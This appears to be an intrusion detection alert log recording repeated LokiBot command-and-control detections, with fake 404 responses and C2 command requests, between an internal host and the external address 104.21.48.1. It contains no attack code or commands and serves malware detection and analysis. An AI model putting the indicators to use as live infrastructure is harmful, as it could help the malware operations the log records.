2025-02-24T08:40:22.404608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:23.289335+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.218133+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.164608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:26.089207+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:27.042767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.817332+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:30.783053+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.626524+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.304291+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:36.116918+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.911290+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:39.155461+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.978187+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.948897+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.899170+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.710799+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.657941+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.331683+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:51.171451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.501662+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.486059+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.514458+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:41:00.499203+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49781	104.21.48.1	80	TCP
2025-02-24T08:41:01.471056+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49782	104.21.48.1	80	TCP
2025-02-24T08:41:02.439271+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.48.1	80	TCP
2025-02-24T08:41:03.364815+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49784	104.21.48.1	80	TCP
2025-02-24T08:41:04.363415+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.48.1	80	TCP
2025-02-24T08:41:05.313428+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49786	104.21.48.1	80	TCP
2025-02-24T08:41:06.266860+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49787	104.21.48.1	80	TCP
2025-02-24T08:41:07.223130+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49788	104.21.48.1	80	TCP
2025-02-24T08:41:08.207649+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49790	104.21.48.1	80	TCP
2025-02-24T08:41:09.194590+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49792	104.21.48.1	80	TCP
2025-02-24T08:41:10.164113+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49798	104.21.48.1	80	TCP
2025-02-24T08:41:11.141303+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49808	104.21.48.1	80	TCP
2025-02-24T08:41:12.035898+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49815	104.21.48.1	80	TCP
2025-02-24T08:41:12.870311+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49821	104.21.48.1	80	TCP
2025-02-24T08:41:13.692580+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49827	104.21.48.1	80	TCP
2025-02-24T08:41:14.622816+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49833	104.21.48.1	80	TCP
2025-02-24T08:41:15.553276+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49839	104.21.48.1	80	TCP
2025-02-24T08:41:16.510554+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49848	104.21.48.1	80	TCP
2025-02-24T08:41:17.303496+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.48.1	80	TCP
2025-02-24T08:41:18.267430+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49862	104.21.48.1	80	TCP
2025-02-24T08:41:19.069504+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.48.1	80	TCP
2025-02-24T08:41:20.023495+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.48.1	80	TCP
2025-02-24T08:41:20.935903+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49880	104.21.48.1	80	TCP
2025-02-24T08:41:21.822435+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49889	104.21.48.1	80	TCP
2025-02-24T08:41:22.752347+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49897	104.21.48.1	80	TCP
2025-02-24T08:41:23.553323+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49903	104.21.48.1	80	TCP
2025-02-24T08:41:24.528729+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49909	104.21.48.1	80	TCP
2025-02-24T08:41:25.873164+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.48.1	80	TCP
2025-02-24T08:41:26.796281+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49926	104.21.48.1	80	TCP
2025-02-24T08:41:27.699453+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49931	104.21.48.1	80	TCP
2025-02-24T08:41:28.632962+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49936	104.21.48.1	80	TCP
2025-02-24T08:41:29.560064+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49943	104.21.48.1	80	TCP
2025-02-24T08:41:30.385197+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49949	104.21.48.1	80	TCP
2025-02-24T08:41:32.375440+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49964	104.21.48.1	80	TCP
2025-02-24T08:41:33.318019+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49970	104.21.48.1	80	TCP
2025-02-24T08:41:34.228783+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:37.082916+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.904806+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.724001+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.692767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.656178+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.463936+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.517139+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.206897+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:50.011745+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.928050+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.872918+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.716435+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.674938+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.522266+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.500735+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.460867+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.399541+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.348044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:01.147226+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.918392+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.899121+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.860065+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.803640+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.557952+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.365524+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50120	104.21.48.1	80	TCP
2025-02-24T08:42:09.184226+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50121	104.21.48.1	80	TCP
2025-02-24T08:42:09.985917+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50122	104.21.48.1	80	TCP
2025-02-24T08:42:10.825701+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50123	104.21.48.1	80	TCP
2025-02-24T08:42:11.653601+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50124	104.21.48.1	80	TCP
2025-02-24T08:42:12.595333+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50125	104.21.48.1	80	TCP
2025-02-24T08:42:13.404659+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50126	104.21.48.1	80	TCP
2025-02-24T08:42:14.333926+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50127	104.21.48.1	80	TCP
2025-02-24T08:42:15.296100+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50128	104.21.48.1	80	TCP
2025-02-24T08:42:16.085309+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50129	104.21.48.1	80	TCP
2025-02-24T08:42:16.940915+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50130	104.21.48.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:20.452902+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49734	TCP
2025-02-24T08:40:24.060335+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49738	TCP
2025-02-24T08:40:25.007429+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49739	TCP
2025-02-24T08:40:25.924180+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49740	TCP
2025-02-24T08:40:26.886828+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49741	TCP
2025-02-24T08:40:29.633516+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49744	TCP
2025-02-24T08:40:30.612533+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49746	TCP
2025-02-24T08:40:32.457461+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49752	TCP
2025-02-24T08:40:35.157658+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49756	TCP
2025-02-24T08:40:35.968020+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49757	TCP
2025-02-24T08:40:37.744097+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49759	TCP
2025-02-24T08:40:38.709627+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49760	TCP
2025-02-24T08:40:42.808907+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49763	TCP
2025-02-24T08:40:43.789129+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49764	TCP
2025-02-24T08:40:44.713764+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49765	TCP
2025-02-24T08:40:46.558039+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49767	TCP
2025-02-24T08:40:47.495291+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49768	TCP
2025-02-24T08:40:49.173085+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49770	TCP
2025-02-24T08:40:51.001958+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49772	TCP
2025-02-24T08:40:53.018974+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49774	TCP
2025-02-24T08:40:54.265551+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49775	TCP
2025-02-24T08:40:56.187810+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49777	TCP
2025-02-24T08:41:00.314010+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49780	TCP
2025-02-24T08:41:01.272765+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49781	TCP
2025-02-24T08:41:02.239014+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49782	TCP
2025-02-24T08:41:06.084858+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49786	TCP
2025-02-24T08:41:08.018819+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49788	TCP
2025-02-24T08:41:09.011425+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49790	TCP
2025-02-24T08:41:10.963926+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49798	TCP
2025-02-24T08:41:12.705687+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49815	TCP
2025-02-24T08:41:13.526559+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49821	TCP
2025-02-24T08:41:14.449049+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49827	TCP
2025-02-24T08:41:16.336695+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49839	TCP
2025-02-24T08:41:17.137098+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49848	TCP
2025-02-24T08:41:18.082165+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49854	TCP
2025-02-24T08:41:18.893595+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49862	TCP
2025-02-24T08:41:19.820190+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49868	TCP
2025-02-24T08:41:23.391403+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49897	TCP
2025-02-24T08:41:24.360148+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49903	TCP
2025-02-24T08:41:25.320397+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49909	TCP
2025-02-24T08:41:26.621350+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49917	TCP
2025-02-24T08:41:28.334290+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49931	TCP
2025-02-24T08:41:29.379930+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49936	TCP
2025-02-24T08:41:30.202799+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49943	TCP
2025-02-24T08:41:33.149472+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49964	TCP
2025-02-24T08:41:36.902910+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49992	TCP
2025-02-24T08:41:37.723665+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	49998	TCP
2025-02-24T08:41:39.553206+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50010	TCP
2025-02-24T08:41:40.519007+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50019	TCP
2025-02-24T08:41:41.492779+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50027	TCP
2025-02-24T08:41:42.283737+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50033	TCP
2025-02-24T08:41:43.109223+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50039	TCP
2025-02-24T08:41:47.012578+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50067	TCP
2025-02-24T08:41:49.806815+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50089	TCP
2025-02-24T08:41:50.754115+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50095	TCP
2025-02-24T08:41:51.693171+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50101	TCP
2025-02-24T08:41:54.537851+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50104	TCP
2025-02-24T08:41:55.491291+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50105	TCP
2025-02-24T08:41:56.327930+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50106	TCP
2025-02-24T08:41:57.314179+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50107	TCP
2025-02-24T08:41:58.280053+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50108	TCP
2025-02-24T08:41:59.228176+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50109	TCP
2025-02-24T08:42:00.173626+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50110	TCP
2025-02-24T08:42:00.972031+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50111	TCP
2025-02-24T08:42:02.708393+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50113	TCP
2025-02-24T08:42:03.714734+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50114	TCP
2025-02-24T08:42:04.683338+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50115	TCP
2025-02-24T08:42:05.636445+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50116	TCP
2025-02-24T08:42:07.391276+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50118	TCP
2025-02-24T08:42:08.189451+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50119	TCP
2025-02-24T08:42:08.992887+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50120	TCP
2025-02-24T08:42:09.813147+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50121	TCP
2025-02-24T08:42:10.653938+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50122	TCP
2025-02-24T08:42:11.479124+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50123	TCP
2025-02-24T08:42:13.236374+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50125	TCP
2025-02-24T08:42:15.122305+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50127	TCP
2025-02-24T08:42:15.921705+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50128	TCP
2025-02-24T08:42:16.710826+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50129	TCP
2025-02-24T08:42:17.699247+0100	2025483	1	A Network Trojan was detected	104.21.48.1	80	192.168.2.4	50130	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T08:40:19.532963+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.48.1	80	TCP
2025-02-24T08:40:20.447785+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.48.1	80	TCP
2025-02-24T08:40:21.324303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.48.1	80	TCP
2025-02-24T08:40:22.245346+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.48.1	80	TCP
2025-02-24T08:40:23.122370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.48.1	80	TCP
2025-02-24T08:40:24.055329+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:25.002119+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.918929+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:26.880323+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:27.805450+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:28.694033+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:29.628482+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:30.607398+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:31.518250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:32.430174+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:33.347667+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:34.228413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:35.152572+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.962938+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:36.837053+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:37.739015+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:38.704503+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:39.868013+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:41.836574+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:42.803843+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:43.783480+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:44.708677+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:45.615534+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:46.552124+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:47.489934+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:48.380589+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:49.167883+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:50.053008+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.996344+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.48.1	80	TCP
